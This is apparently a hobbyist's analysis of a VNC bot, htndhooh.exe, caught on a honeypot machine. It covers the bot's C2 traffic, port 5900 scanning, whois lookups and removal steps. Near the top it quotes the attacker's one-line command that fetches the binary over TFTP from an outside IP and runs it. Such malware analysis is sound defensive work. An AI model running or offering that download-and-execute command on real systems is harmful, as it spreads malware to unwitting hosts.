endellion.me.uk MSMSGNER (htndhooh.exe)
Using VNC password flaw, 71.89.139.xxx connected and forced download of htndhooh.exe (well at least that's what mine was called) from somewhere else:
%comspec% /c tftp -i 83.226.184.184 GET htndhooh.exe & start htndhooh
At the start of htndhooh.exe a DNS query is made for jruozzfsex.egotlmdhwntvgbomjtvn.com which mercifully doesn't appear to be a registered domain name. The next query for jruozzfsex.nandomort.com yields an IP of 75.39.61.190.
Straight away a UDP packet flies in that direction, to port 48742. Attached are 50 bytes of cryptic data.
A UPD packet then comes back to Server, from 24.28.52.51 at port 16312, with 44 bytes of equally cryptic data. Though I presume the orders are somehow encapsulated within, I can't see it. Better brains no doubt can.
0000 43 21 a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C!...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f f9 fa 92 a9 De.0j...%.......
0020 46 b2 4a 48 c9 fb 2f af c1 e5 05 50 F.JH../....P
Then the great scanning of tcp port 5900 begins. All IP's start with 8, as does mine own, the rest of the digits are randomly chosen.
Htndhooh.exe has opened some ports for listening, to wit TCP port 60644, and UDP 16312. At regular intervals UDP packets come in from 24.28.52.51, and go out to 75.39.61.190.
And who might nandomort.com be? (see below)
What is the relationship between all these IP addresses?
The original infector comes from Charter.com, so is presumably an unwitting infectee. (How they can keep their computer going I do not know.) The download of the binary comes from Sweden (inetnum: 83.226.184.0 - 83.226.191.255; netname: BB-BISP-SVL10-SE; descr: B2 customer network; country: SE)
The UDP packet gets sent to nandomort.com (;; ANSWER SECTION:
jruozzfsex.nandomort.com. 3600 IN A 75.39.61.190) which belongs to
SBC Internet Services SBCIS-SBIS-6BLK (NET-75-0-0-0-1)
75.0.0.0 - 75.63.255.255
STAFFORD LESTER DBA-061103122203 SBC07503906118429061103122214 (NET-75-39-61-184-1)
75.39.61.184 - 75.39.61.191
And then there's packets coming back from 24.28.52.51, whose whois goes along the lines of timeout:
[bored@Fedora ~]# whois 24.28.52.51
[Querying whois.arin.net]
[Redirected to ipmt.rr.com]
[Querying ipmt.rr.com]
and that's that. Roadrunner is not the most conscientious colocator then, I suppose. Traceroute takes it to mta-24-28-52-51.austin.rr.com (24.28.52.51).
But they are communicating somehow: packets only come back from roadrunner if they first get sent off to nandomort. Hmmm.
And why might they be wanting to do this? Alas. I can't find out yet. The ferocity of scanning has made poor Server come up with the dreaded Low on Memory status, and to top this the inner firewall has fallen over under the strain of holding back packets from the innocent internet. All this stuff runs as virtual machines on an outdated yesteryear's Intel Pentium D830 3GHz in a DX955XBK board with 1 GB of memory. Basically not enough. Funding, anyone? Paypal button to follow.
Second run
Restarting htndhooh.exe reveals that the choice of listening ports is random. As is the name of the server at nandomort.com, evidently. This time the query went out for wbijojpvzz.nandomort.com, but resolved as 75.39.61.190 again. The packet goes to the same port, 40742, and the returning packet still comes from 24.28.52.51.
This means that the notification of the listening port must have been enclosed in the sent packet.
0000 00 64 c0 a8 00 a0 11 62 b9 00 06 c6 b7 03 11 5a .d.....b.......Z
0010 6f 18 d6 0f cd 21 fb 81 6e 38 18 fd 4c b9 b3 10 o....!..n8..L...
0020 fe 04 e1 bd 82 31 42 ad c0 08 1c 14 0f 59 4e 9e.....1B......YN.
0030 4d 35 M5
3fb8 should be here, and 6cb7. Hmm. Maybe that's too simplistic for them.
Two packets come back.
0000 43 39 a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C9...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f 2b d4 88 09 De.0j...%...+...
0020 65 44 83 c6 4c 6d 55 70 bd 93 87 51 eD..LmUp...Q
and
0000 43 3a a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C:...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f f8 85 3a df De.0j...%.....:.
0020 13 2a cb b1 d2 c7 36 27 10 9c 63 fd .*....6'..c.
Obviously the first 4 bytes are a counter. Counting what? The first ever packet started with 43 21 ( 17185 ).
[bored@Fedora ~]# whois nandomort.com
[Querying whois.internic.net]
[Redirected to whois.dns.com.cn]
[Querying whois.dns.com.cn]
[whois.dns.com.cn]
Domain Name.......... nandomort.com
Creation Date........ 2006-08-29 01:13:35
Registration Date.... 2006-08-29 01:13:35
Expiry Date.......... 2007-08-29 01:13:35
Organisation Name.... cheng li
Organisation Address. shang xi
Organisation Address.
Organisation Address. shang xi
Organisation Address. 345678
Organisation Address. LN
Organisation Address. CN
Admin Name........... cheng li
Admin Address........ shang xi
Admin Address........
Admin Address........ shang xi
Admin Address........ 345678
Admin Address........ LN
Admin Address........ CN
Admin Email.......... adf@sina.com
Admin Phone.......... +86.2123456789
Admin Fax............ +86.2112345678
Tech Name............ cheng li
Tech Address......... shang xi
Tech Address.........
Tech Address......... shang xi
Tech Address......... 345678
Tech Address......... LN
Tech Address......... CN
Tech Email........... adf@sina.com
Tech Phone........... +86.2123456789
Tech Fax............. +86.2112345678
Bill Name............ cheng li
Bill Address......... shang xi
Bill Address.........
Bill Address......... shang xi
Bill Address......... 345678
Bill Address......... LN
Bill Address......... CN
Bill Email........... adf@sina.com
Bill Phone........... +86.2123456789
Bill Fax............. +86.2112345678
Name Server.......... ns1.dns.com.cn
Name Server.......... ns2.dns.com.cn
Removal?
Go back to last snapshot, usually... But.
%systemdir%\%windir%\system32\htndhooh.exe (fill in the particular name that can be found in the registry key below) needs deleting
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run contains a key MSMSGNER which needs deleting